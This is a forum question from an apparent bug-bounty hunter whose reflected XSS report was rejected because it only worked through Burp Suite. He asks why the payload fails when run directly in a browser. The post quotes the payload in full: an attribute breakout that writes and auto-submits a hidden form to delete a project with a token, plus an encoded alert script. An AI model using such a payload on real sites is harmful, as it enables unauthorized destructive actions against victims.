Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

Without Burpsuite XSS not execute

Shuvo Ahmed Nov 25, 2019 09:05PM UTC

Hello every one,
I am facing a poblem.
I found a Reflected XSS and report it but they dont accept it . They said
----------------------------------------------------------------------------------------
Thank your for the report. In your reproduction steps you use burp. Could you add reproduction steps to exploit this vulnerabilitie without the use of burp?
We ask this because having to trick your victim into installing a proxy like burp and getting them to capture and edit their own request is not very likely to happen.
If you are not able to exploit this XSS without the use of a proxy we have to reject this report.
----------------------------------------------------------------------------------------------

Then i tryed to execute xss directly in browser but its not working.

payload :
">document.writeln(‘<form width=”0" height=”0" method=”POST” action=”’+x+’adminAdvanced.do”>’); document.writeln(‘<input type=”hidden” name=”token” value=”’ + token + ‘“ />’); document.writeln(%3Cscript%3Ealert%281%29%3C%2fscript%3E‘<input type=”hidden” name=”deletebtn” value=”Delete+project” />’); document.writeln(‘</form>’); document.forms[0].submit();

when i use burpsuite the xss execute and give alert (1)
but when i try to execute directly in browser its not execute. but why?

Is there any solution ?

Thank you


Post Your public answer

Your name
Your email address
Answer